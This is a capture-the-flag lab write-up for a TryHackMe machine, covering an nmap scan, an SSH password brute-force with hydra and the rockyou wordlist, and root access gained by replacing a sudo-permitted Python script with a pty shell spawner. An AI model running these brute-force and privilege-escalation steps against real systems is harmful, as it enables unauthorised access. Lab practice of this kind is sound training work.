# CTF TryHackMe - Agent Sudo

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.195.16 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-14 18:50 CEST
Nmap scan report for 10.10.195.16
Host is up (0.083s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE         VERSION
22/tcp   open     ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
|   256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_  256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
80/tcp   open     http            Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to  Blog - Library Machine
8082/tcp filtered blackice-alerts
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.30 seconds
```

## Check website

Lets check the website on port 80

```
http://10.10.195.16/robots.txt
User-agent: rockyou 
Disallow: /
```

We got a username on http://10.10.195.16/ : **meliodas**

The hint in robots.txt says "rockyou" so trying to bruteforce ssh using meliodas as username and rockyou wordlist as password

```bash
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt -s 22 -f 10.10.195.16 ssh
[22][ssh] host: 10.10.195.16   login: meliodas   password: iloveyou1
```

Yes, we got an ssh acces

## PrivEsc

First we list sudo permissions

```bash
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
```

Check bak.py python script


```bash
meliodas@ubuntu:~$ ls -la bak.py 
-rw-r--r-- 1 root root 353 Aug 23  2019 bak.py
meliodas@ubuntu:~$ cat bak.py 
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
```

Delete the python script

```bash
rm -rf bak.py
```

Then create a new one to spawn a root shell

```bash
echo 'import pty;pty.spawn("/bin/bash")' > bak.py
```

And execute the script with sudo

```bash
sudo /usr/bin/python /home/meliodas/bak.py
```
and we'rrr root

